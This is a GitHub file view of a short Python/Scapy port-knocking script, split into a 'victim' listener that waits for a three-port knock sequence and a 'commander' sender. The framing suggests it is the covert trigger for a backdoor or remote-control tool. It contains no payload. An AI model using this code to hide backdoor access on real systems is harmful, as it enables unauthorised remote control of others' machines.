-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathportknocker.py
90 lines (72 loc) · 2.58 KB
/
portknocker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
from scapy.all import *
from scapy.layers.inet import *
import time
knock_ports = [1001, 2002, 3003]
timeout = 3
commander = False
########################
#### FOR Victim ####
########################
def port_knocking(victim_ip):
"""
Perform port knocking on the victim side to authenticate the commander.
Args:
victim_ip (str): IP address of the victim.
Returns:
tuple: IP address and port number if successful, None otherwise.
"""
potential_commanders = {}
while True:
packet = sniff(filter=f"tcp and dst {victim_ip}", count=1)[0]
if TCP in packet and IP in packet:
src_ip = packet[IP].src
src_port = packet[TCP].dport
if src_port in knock_ports:
current_time = time.time()
if src_ip not in potential_commanders:
potential_commanders[src_ip] = []
potential_commanders[src_ip].append((src_port, current_time))
# Check if all knock ports have been hit within the timeout period
print(potential_commanders)
if len(potential_commanders[src_ip]) >= len(knock_ports):
# Check for valid timestamps
valid_timestamps = True
for i, (port, timestamp) in enumerate(potential_commanders[src_ip]):
if i == 0:
continue
previous_timestamp = potential_commanders[src_ip][i - 1][1]
if abs(timestamp - previous_timestamp) > timeout:
valid_timestamps = False
potential_commanders.pop(src_ip)
if valid_timestamps:
# Successful port knocking sequence
return src_ip, 7000
# Wait for the next packet
time.sleep(0.1)
########################
#### FOR COMMANDER ####
########################
def send_knock(ip, port):
"""
Send a knock packet to the victim.
Args:
ip (str): IP address of the victim.
port (int): Port number for the knock.
Returns:
None
"""
packet = IP(dst=ip)/TCP(dport=port)
print("PACKET", packet)
send(packet, verbose=False)
def perform_knock_sequence(ip, time_out):
"""
Perform the port knocking sequence on the victim.
Args:
ip (str): IP address of the victim.
time_out (int): Time to wait between knocks.
Returns:
None
"""
for port in knock_ports:
send_knock(ip, port)
time.sleep(time_out)